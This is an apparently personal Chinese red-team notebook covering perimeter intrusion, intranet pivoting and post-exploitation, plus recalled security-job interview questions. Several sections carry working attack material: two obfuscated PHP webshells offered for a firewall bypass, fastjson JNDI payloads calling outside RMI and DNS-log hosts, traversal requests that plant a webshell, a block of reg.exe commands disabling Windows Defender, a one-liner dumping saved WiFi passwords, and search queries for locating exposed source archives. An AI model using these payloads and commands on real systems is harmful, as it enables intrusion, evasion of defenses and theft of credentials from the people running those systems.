- 🏴☠ 打点-隐藏资产探测-host碰撞
- 🏴☠ "登录框" 攻击面
- 🏴☠ 宝塔防火墙 Bypass
- 🏴☠ fastjson bypass 某WAF
- 🏴☠ 内网-代理(reGeorg+Proxifier+Win)
- 🏴☠ 内网-代理(reGeorg+proxychains+Linux))
- 🏴☠ 内网-代理(ssocks反向代理))
- 🏴☠ 打点-Druid未授权访问->RCE
- 🏴☠ 打点-任意文件下载->RCE
- 🏴☠ pocsuite3代理使用
- 🏴☠ 打点-子域名爆破-泛解析问题
- 🏴☠ "SQL注入" 攻击面
- 🏴☠ "文件删除" 攻击面
- 🏴☠ "Java SSRF" 攻击面
- 🏴☠ 黑盒-漏洞挖掘(弱口令->任意文件下载->RCE)
- 🏴☠ 打点-ThinkPHP 5.0.X(debug模式+空数组)
- 🏴☠ 内网-CMD获取RDP端口
- 🏴☠ 内网-规避杀软 Windows Defender
- 🏴☠ 打点-文件下载-mlocate.db
- 🏴☠ 内网-CMD获取WIFI密码
- 🏴☠ 内网-DMZ区突破
- 🏴☠ 内网-PowerShell命令历史记录
- 🏴☠ 内网-定位多网卡主机
- 🏴☠ 内网-主机"不出网"
- 🏴☠ 内网-跨域
- 🏴☠ 打点-Confluence RCE利用
- 🏴☠ 打点-文件下载-.net环境
- 🏴☠ 秋招-从安服->安研(面经)
- 🏴☠ 内网-vSphere & vCenter的后利用姿势
- 🏴☠ 钓鱼-邮箱探针
- 🏴☠ 内网-Citrix的后渗透思路
- 🏴☠ 打点-Confluence后利用思路
- 🏴☠ 基建-关于学习RFC规范的必要性
- 🏴☠ 基建-负载均衡场景下的渗透
- 🏴☠ 云安全-K8S场景下的渗透
- 🏴☠ 信息收集-FoFa获取闭源软件源码
step1: 搜集子域名
step2: 搜集IP (目标域名历史解析IP)
step3: 以IP+域名的形式进行碰撞
传送:
https://github.com/fofapro/Hosts_scan
https://github.com/shmilylty/OneForAll
https://fofa.so/
https://site.ip138.com/
https://ipchaxun.com/
https://securitytrails.com/list/apex_domain/ # 子域名
参考:
https://www.cnblogs.com/Rain99-/p/13756032.html
https://xz.aliyun.com/t/9590
复现:
环境搭建
实验环境
# 安装nginx
apt install nginx
# 创建nginx配置文件
/usr/sbin/nginx -t
# 配置文件位置
/etc/nginx/nginx.conf实战环境(模拟)
- 反代
- 限制IP访问
文件nginx.conf配置如下
http {
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
# include /etc/nginx/sites-enabled/*;
# 限制IP访问
server {
listen 80 default;
server_name _;
return 403;
}
server {
listen 80;
server_name nginx.lab.com;
location / {
proxy_pass http://10.10.10.12:8000;
index index.html index.htm index.jsp;
}
}
}
复现效果
如下图所示
-
IP访问
-
域名访问
Windows
# 修改 hosts
notepad %windir%\system32\drivers\etc\hosts
# 添加以下绑定关系
10.10.10.12 nginx.lab.com
使用Burpsuite复现
- 用户名枚举
- 空口令
- 弱口令
- 登录认证绕过
- 暴力破解
- 图形验证码绕过
- 短信验证码绕过(或爆破)
- 短信轰炸(重放)
- 邮箱轰炸(重放)
- 密码明文传输
- SQL注入(万能密码)
- 任意用户密码重置
- 目录遍历
- 敏感信息泄露
- 框架漏洞(shiro)
- XSS
- JS文件
- 传参方式 $_COOKIE
- 编码绕过流量检测
3重 base64 失败(似乎检测了关键字‘base64’)
3重 url编码 成功
贴两个🐎(侵删)
demo1:
<?php
$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p;
?>demo2:
<?php
$poc ="axsxsxexrxt";
$poc_1 = explode("x", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];
$poc_2(urldecode(urldecode(urldecode($_REQUEST[x]))));
?>demo
{{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0
bypass
{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}
# reGeorg
https://github.com/sensepost/reGeorg
# Proxifier
https://pc.qq.com/detail/13/detail_10593.html
上传对应的tunnel文件,如图即可
然后attack-pc 执行
python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 8888proxifier配置代理如下
- 127.0.0.1:8888
- socks5
# reGeorg
https://github.com/sensepost/reGeorg
# Proxifier
https://pc.qq.com/detail/13/detail_10593.html
上传对应的tunnel文件,如图即可
然后attack-pc 执行
python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 4561proxychains配置如下:
- vim /etc/proxychains.conf
demo: 使用proxychains代理远程登录windows
proxychains rdesktop -g 1440x900 172.17.17.7:3389 //-g后面代表要使用的分辨率
https://sourceforge.net/projects/ssocks/
参考: https://apt404.github.io/2016/09/12/ssocks/
- 目录扫描 /druid/index.html
- 信息泄露 Session & URI(后台)
- 伪造session进入后台,发现上传点
POST /index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Origin:
Referer:
Cookie: JSESSIONID=589A43F0FAxxxxxx2A4403C143A77A51
- 绕过前端js验证实现任意文件上传
- 发现1处文件下载的地方
GET /download?module=&method=Download&name=test.zip&filepath=doc/test.zip HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml
Accept-Encoding: gzip, deflate
- burp抓包,换为post请求发现可下载任意文件
POST /download HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml
Accept-Encoding: gzip, deflate
module=&method=Download&name=test.zip&filepath=../webapps/WEB-INF/web.xml
- 读取日志文件判断class文件的位置
POST /download HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml
Accept-Encoding: gzip, deflate
module=&method=Download&name=test.zip&filepath=../logs/catalina.2021-xx-xx.log
-
下载class文件分析审计,在/download路由下的servlet存在上传文件和更新文件的操作
- 首先上传一个空文件到web目录
POST /download HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml Accept-Encoding: gzip, deflate module=&method=upload&txtFile_Name=x.jsp&home=/&filepath=../webapps/- 更新文件内容为webshell
POST /download HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml Accept-Encoding: gzip, deflate module=&method=updateContent&home=/&filepath=../webapps/x.jsp&content=xxxxxx -
成功突破网络边界进入内网
命令行:
python cli.py -r pocs\rce.py -u http://127.0.0.1/ --verify --proxy socks5://1.2.3.4:5678
python cli.py -r pocs\rce.py -u http://127.0.0.1/ --verify --proxy socks4://1.2.3.4:5678
python cli.py -r pocs\rce.py -u http://127.0.0.1/ --verify --proxy http://1.2.3.4:5678
python cli.py -r pocs\rce.py -u http://127.0.0.1/ --verify --proxy https://1.2.3.4:5678proxier:
0.泛解析
原理:
利用通配符(*)将所有某个级别的域名解析到同一个IP地址上。
举例:
现有域名github.com, 设置泛解析后,所有该域名下的子域aaa.github.com,bbb.aaa.github.com都会被解析到和github.com相同的ip地址。1.OneForAll:
访问一个随机的并不存在的域,通过返回结果判断是否存在泛解析,若存在泛解析,程序会不断的循环产生随机域名向服务器查询,将每次查询到的IP和TTL记录下来,直到大部分的IP地址出现次数都大于两次,则IP黑名单的收集结束,在得到了IP黑名单以后,将自己的字典中的每一项和要指定查询的域名进行拼接爆破,然后根据IP黑名单进行过滤。2.SubdomainBrute
超过10个域名指向同一IP,则此后发现的其他指向该IP的域名将被丢弃。3.目前思路-TTL黑名单
在权威 DNS 中,泛解析记录的 TTL 肯定是相同的,如果子域名记录相同,但 TTL 不同,那这条记录可以说肯定不是泛解析记录。- 万能密码
- 敏感信息
邮箱/电话等 -> 供社工钓鱼使用 - 凭证
session/密码等 -> 外网系统入口(OA/邮箱/VPN) - RCE
- mssql xp_cmdshell
- mysql udf
- Webshell
- mysql
- mssql
- oracle
- SSRF
- mssql
- oracle
- 端口扫描
- oracle
- 凭据(NTLM Hash)
- Windows & UNC
- 删除install.lock导致重装,进而RCE
- /sys/install.lock VAuditDemo
- 删除某些配置文件导致重装,进而RCE
- my.php 然之协同
- 删除权限校验文件,组合受限漏洞(文件上传/SQLi注入等),进而RCE
- /inc/auth.inc.php 通达OA
- 删除账号密码配置文件,导致账号密码重新配置,进而获得管理员权限
- /WEB-INF/resources/privilege.xml 帆软报表系统(FineReport)
- 利用file协议任意文件读取
- 利用http协议端口/服务探测
- 利用http协议进行 ntlm relay
- 组合redis等内网服务从而rce(weblogic)
- Tip:
fofa随缘,独立ip 1000+即可
step1
- 搜索产品的安装手册/用户手册(弱口令,影子账户等)
- 发现通用弱口令-admin/admin
step2
- 登录后台并测试功能点,burp抓取流量
- 发现参数:?xmlPath=
- 构造payload
.action?xmlPath=../../conf/tomcat-users.xml .action?xmlPath=../../webapps/examples/WEB-INF/web.xml - 经测试存在任意文件读取漏洞
step3
- 回溯burp的代理流量
- cookie发现参数:rememberMe
- 尝试组合任意文件读取进行漏洞利用
- web.xml -> shiro.ini(失败)
- tomcat-users.xml -> 控制台利用思路(失败)
- 最后还是作为脚本小子的快乐:)
- 若目标启用了 debug 模式,敏感功能点传递空数组可能会引起程序抛出异常泄露敏感信息 by xxxeyJ
POST /index/login HTTP/1.1
User-Agent:
Accept:
Accept-Encoding:
Content-Type:
username=admin&password[]=&verifycode=Terminal下执行
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
响应
PortNumber REG_DWORD 0xd3d
进制转换得到
# Defensive Evasion
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fmlocate.db是linux下的一个数据库文件,用于存放locate命令的索引,也就是相当于存放了所有文件的路径。
文件位置
/var/lib/mlocate/mlocate.db
与之对应的命令 — locate
在拿到目标权限后做信息收集还是蛮不错的
locate web.xml
— by chengmo
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
本质:找到能通向内网的主机
- 双网卡主机
- 历史登录IP:可能来自内网的运维
- 站库分离:数据库服务器很可能在内网
- VPN:信息收集
- 钓鱼:钓鱼上线的机子大概率是在办公网)
— 类似Linux下的.bash_history
文件位置
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
利用思路
- 打点: 任意文件下载+Windows系统,可以尝试一下该路径,也许有新世界
- 内网: 信息收集
- 蓝队: 溯源取证时,毕竟CMD一直以来都被诟病,PowerShell改改颜值还是很能打的,但是也就悄悄地给蓝队留下了"证据"(:
工具
条件
- 目标主机: 开放135端口
后续
- 考虑到平台兼容性,可以根据OXID-Find用其他语言重构一版自用。
本地环境搭建中
本地环境搭建中
近期的1次实战
- Confluence RCE(CVE-2021-26084),写入webshell,获取服务器权限
- 找到数据库配置文件,获取数据库权限
- 前期信息收集发现WIKI、Jira等站点需要AD账号登录,猜测其数据库有LDAP信息
- 在cwd_directory_attribute表找到LDAP配置信息,拿到密码
- 通过该密码获取源码管理平台(Gitlab)的控制权
这是对学校某网站随机测试发现的,当时可下载web.config,由于不熟悉.net就没有后续了。
前段时间隔壁班的大佬提示说: 可以尝试下载源码审计一波👀
在xx通知页面发现一处文件下载的功能点
- /tp/DownLoadFile.aspx?filename=
于是开始猜其目录
?filename=DownLoadFile.aspx
?filename=./DownLoadFile.aspx
?filename=./../DownLoadFile.aspx
......
最后以
- ?filename=./../DownLoadFile.aspx
成功下载
1.下载web.config,获取数据库配置以及部分网站架构
如图,可获取到数据库密码
2.遍历下载*.aspx,然后根据Inherits所引用文件的位置,构造路径下载*.dll,然后dnSpy反编译后审计即可
示例:文件下载漏洞
写在前面:
两年了,虽菜但学🙈。
由于个人成长和发展的原因,校招选择了某家实验算是从头开始搞Java安全。然后加上工作内容的变化,来这边后就不怎么做渗透了,所以打算暂时停更这个渗透系列了! 上周末整理笔记时发现了有做记录的几次面试(不含现在的东家),想着也一并贴上供有需要的人参考学习,也算是记录一下自己从20年7月的第1份驻场实习offer到现在(21年10月)的秋招offer这一路的👣吧!
试题来源:
- 实习 + 秋招
有些试题是后面靠回忆补充的,或有偏差 :)
面试难度
- 🏴
面试试题
# 2020年暑期实习
1.挖过的一些漏洞(举例说明)
2.渗透测试的思路(结合自己的经验)
3.安全工具的使用(xray,sqlmap,awvs等)
4.owasp top 10
- 记住是哪10个
- 知道漏洞原理
- 知道防御姿势
5.owasp top 10中自己熟悉/经常挖到的漏洞
6.sql注入
- 漏洞几种类型
- 漏洞成因
- 防御方法
7.编程能力(写一些小脚本,改一些poc等)
面试难度
- 🏴🏴🏴
面试试题
# 2020年暑期实习
0.自我介绍
1.实习经历
2.hw经历
3.对红蓝对抗的看法
4.发展方向和规划
5.挖过哪些洞?追问原理
6.挖过最有意思/最难的一个洞
7.sql注入写shell
8.内网渗透
9.域渗透
10.Java反序列化基础
11.跟过哪些nday,怎样一个思路
12.shiro反序列化
13.怎样对一个站去挖nday
14.挖到过0day吗
15.代码审计
16.实战有没有遇到xxe,oracle注入,mssql注入,ssrf,csrf
17.一些逻辑漏洞
18.app渗透经历
19.会不会二进制/逆向
...
# 小结
只记得当时技术面结束后,面试官和我说: 你后面还有很多基础需要补啊!🙈
面试难度
- 🏴🏴🏴🏴
面试试题
sql注入的报错函数
dom 型 xss
ssrf 利用点
sql注入点,空表如何利用
mvc代码审计流程
看你简历有在挖洞,说一下你挖过的洞
Redis 利用姿势及环境差异
fastjson回显
jndi注入及原理
端口 389
Java 回显
泛微oa xstream的回显(jdk1.8和1.7的差异)
shiro 限制payload长度
Java回显的通用思路以及不同版本jdk的差异
文件上传白名单利用
00截断的原理
判断域控的几种方式
工作组横向
域内横向
Windows认证协议
白银票据黄金票据
判断是否在域内
hash传递原理
权限维持
横向移动的各种姿势及原理
凭证获取(姿势/常用/原理/对抗)
如何对抗杀软加后门用户
Chrome dump密码的原理,如果让你写个工具,思路是什么(或者别人工具的实现原理)
from towns_
面试难度
- 🏴🏴🏴
面试试题
# 主要是两大块:Java反序列化和内网
Java反序列化
1.有哪些CC链是有回显的
2.Java反序连化相关的协议
3.熟悉的Java的漏洞,选一个来深入问,shior系列,550,721原理,key对了无法反序列化,不是无链的原因
- serialVersionUID
内网
1.有一台Windows机器你会做些什么
2.有明文密码,密文密码你会做些啥。
3.有个基于webshell的,但TCP不出网,不会怎么做。
4.PTH
5.DCsync原理,DCsync是那个协议
6.有台Windows域内机子,你怎么打域控
面试难度
- 🏴🏴
面试试题
# 基础
1. http状态码,502,503,501
2. http请求方式及各自作用
3. 计算机网络的分层及分别有哪些协议
# owasp top 10
1. xss如何执行代码
2. xss常用哪些标签
3. http only
4. 怎样判断是否存在注入
5. sql注入无回显怎么办
6. 延时注入除了sleep的其他姿势(mysql)
7. dnslog的实现原理
8. sql注入,单引号被拦截,如何绕过
9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell
10.redis的利用,如何shell,相关命令
11.ssrf的原理即后利用,怎么执行命令,常搭配使用的协议
# PHP安全相关
1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. vender目录
6. phpunit
7. php可以构造无文件shell吗
# Java安全相关
1. 挖过的通用洞,你会怎么利用(组合)
2. 命令的函数或包
3. java哪些框架,审过哪些框架,它们常出现的问题是什么
4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型
5. tomcat做回显
6. 内存马的实现
# 其他
- 写poc/exp的经历和心得
- 复现的一些漏洞
- Linux 提权的姿势
- Linux下有哪些文件进行渗透时比较关注的,及文件权限问题
- dirty cow 的时间及其修复版本(哪年后就没法用了)
- 你觉得什么是你自己比较擅长的而我没有问到的
# 小结
这个岗位主要是搞漏洞挖掘和利用以及原理分析,Web方面就是JAVA和PHP的安全研究,比如JAVA下的流行框架,组件和服务器应用的安全问题。
没有问内网!!!
面试难度
- 🏴🏴
面试试题
1.自我介绍
2.印象深刻的一次渗透
3.渗透测试的流程
4.SQL注入原理,及常用payload(手写-爆表名)
5.SQL注入空格不能使用如何绕过
6.SQL注入防御,延申预处理不能预防哪些注入
7.同源策略
8.a.baidu.com和b.baidu.com是否同源
9.SSRF原理,利用
10.攻击redis的方式(手写payload)
11.CSRF的原理及防御
12.一种特殊的CSRF场景:后端只解析json格式的时候如何利用CSRF(非更改Content-Type)
13.SameSite
14.DNS Rebinding
15.Fastjson反序列化及如何修复
16.子域名枚举用过那些工具,原理是什么,如果出现了任意子域名都返回200是什么原因?
17.Java学到哪种程度了?
面试难度
- 🏴🏴
面试试题
## 一面
# 问题
1. 自我介绍
2. 根据简历问(主要是挖洞方面)
3. 对SAST的理解
4. 对IAST的理解
5. 污点分析
6. 对DevSecOps的理解
7. 对SDL的理解
8. 后面的发展规划(学习方向)
9. 目前掌握的语言栈怎么样?愿意去学习新的语言吗?
10. 对SAST和IAST中哪个更感兴趣
11. 讲讲白盒审计的思路
12. 有写过相关的自动挖掘工具吗
# 小结
体验很好,感觉双方更像是在探讨。
## 二面
# 问题
1. Java反序列化
2. 了解哪些白盒审计的工具,知道原理吗
3. 域控的攻击方式
4. MS14-068的原理
5. 黄金和白银票据的利用及其效果,原理层面
6. IAST
7. 污点跟踪
8. 候选人的语言栈:java和go
# 小结
估计凉凉,说让我去提前实习,我说想拿正式Offer
面试难度
- 🏴🏴🏴
面试试题
## 渗透基础
0.自我介绍
1. SQL注入 写 Shell
mysql & mssql & oracle
2. 登录框攻击面
3. getshell的姿势
4. 文件上传点,黑名单限制,如何利用
5. SQL注入后利用
6. 讲一个你觉得有趣的漏洞案例
7. 前段时间蓝凌OA的洞
8. DNS 重绑定,利用
9. Php和Java的文件包含区别
10. Redis的利用
## PHP
1. 常见漏洞对应函数(挨个问)
- 命令执行
- 代码执行
- 文件包含
- 文件上传
- 文件删除
- SSRF
- ...
2. PHP安全特性有关注吗
3. 代码审计(mvc/非mvc)
## Java
1. Java执行命令的几种方式
2. Java反序列化的原理
3. 讲讲yso的链
4. Shiro 反序列化原理
5. 反射,代理,类加载这些熟悉吗
6. 代码审计
## Python
1. 是否写过非脚本的工具
2. Web框架(flask/django)
3. 代码审计
## 漏洞挖掘(重点关注)
1. 简历上的通用洞挨个问
2. 漏洞利用研究的理解
3. 漏洞利用研究的案例
## 内网(偏实战问题)
1. disable function bypass
2. webshell 提权(低权限 -> 高权限)
3. 已经拿到webshell,说说你的内网思路
4. 不允许扫描,如何横向
5. 存在杀软,不允许exe落地,怎么办
6. 常用的提权姿势
7. 内网代理,详细问了frp
— 历史笔记整理
关于vcenter的利用主要是在已经获取服务器权限的情况下
(登录后台)
- 从 vCenter 备份中提取 IdP 证书并伪造管理员身份登录后台(实战案例)
- 工具地址
data.mdb位置:
-
Linux:
/storage/db/vmware-vmdir/data.mdb -
Windows
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
实测效果
然后访问https://10.10.10.1/ui,在 /ui 路径下替换上一步所获得的cookie即可
进入后台后
- 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth;
- 也可传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即可。(by banliz1)
# by se7ensec.cn
平常去河边钓鱼,要使用浮漂才会知道这条河是否有鱼吃饵料,同理当邮件投递出去后,此探针可以判断目标是否点击了邮件,不至于那么的苦等。
Citrix虚拟化应用常常与AD域绑定,如果被登录,将会对整个域安全造成非常重大的风险。
- 修改数据库,实现用户登录
- 修改用户登录口令
- 修改Personal Access Tokens(by 3gstudent)
- 写文件
- Windows: Confluence默认权限为network service,具有写权限
- Linux: Confluence默认权限为confluence,没有写权限,可以尝试内存马
测试CVE-2021-26084:
- Windows Server 2016
- Atlassian Confluence 7.4.10
- Postgresql 12.8-1
- AntSword
目录:
- 数据库配置-confluence.cfg.xml
# Windows默认安装
C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml
# Ubuntu默认安装
/var/atlassian/application-data/confluence/confluence.cfg.xml
最近的一次小组例会上有幸收到了来自leader的leader的建议 —— 多看看RFC文档、技术基建要做好。(缘起log4shell)
For better or worse, Requests for Comments (RFCs) are how we specify many protocols on the Internet. RFC规范实际使用场景示例:
- 从RFC规范看如何绕过waf上传表单 上篇
- 从RFC规范看如何绕过waf上传表单 下篇
- 利用 URN 绕过 URL 检查
- 利用 multipart boundary 绕过 WAF
- An Exploration of JSON Interoperability Vulnerabilities
学习参考:
- Why?
相信能看到这些笔记的师傅可能都曾遇到过负载均衡场景下的渗透问题,比如你通过nday打下了一台weblogic,并上了webshell,当你对目标机子再次发起请求时,你会发现执行命令出错,也许会猜测是因为网络问》题;于是你再用exp打了一次,成功了,此时的ip可能发生了变化;失败了,漏洞不存在了?在这些问题的背后,很有可能就是
负载均衡在作祟。再加上微服务架构和K8S的兴起,负载均衡的应用也越来越多,这是个不得不学习 & 解决的坑。
- What?
# 通俗理解: 一个超市的收营员高峰期只能服务10位顾客,当做活动时有20位顾客需要服务的话可能就会排长队,这样购物体验将会很差(就像客户抱怨系统/网站访问太慢)。最简单的办法就是再招个营业员,重新开通一个出口。负载均衡的核心就是“分摊压力”。
- How?
- Kubernetes安全测试实践录
- Kubernetes(K8s)横向移动办法
- Kubernetes安全入门
- Kubernetes集群渗透测试
- K8s渗透测试之kube-apiserver利用
- K0OTKIT:HACK K8S IN A K8S WAY
- 华为云CTF cloud非预期解之k8s渗透实战
- 容器安全 & 容器渗透学习笔记
- 云原生安全|基于容器ATT&CK矩阵模拟攻防对抗的思考
- 学习K8S中常见的21种攻击方式
- 红蓝对抗中的云原生漏洞挖掘及利用实录
其他测绘引擎同理 示例:
body="web.config" && "oa" && "rar" && country="CN"
body="web.config" && "U8" && country="CN"
body="web.config" && "EAS" && country="CN"
body="web.config" && "k3s" && country="CN"
body="web.config" && "kingdee" && country="CN"
body="web.config" && "系统" && country="CN"
body="web.config" && "办公" && country="CN"
body="web.config" && "EKP" && country="CN"
...
效果: 某OA全家桶?
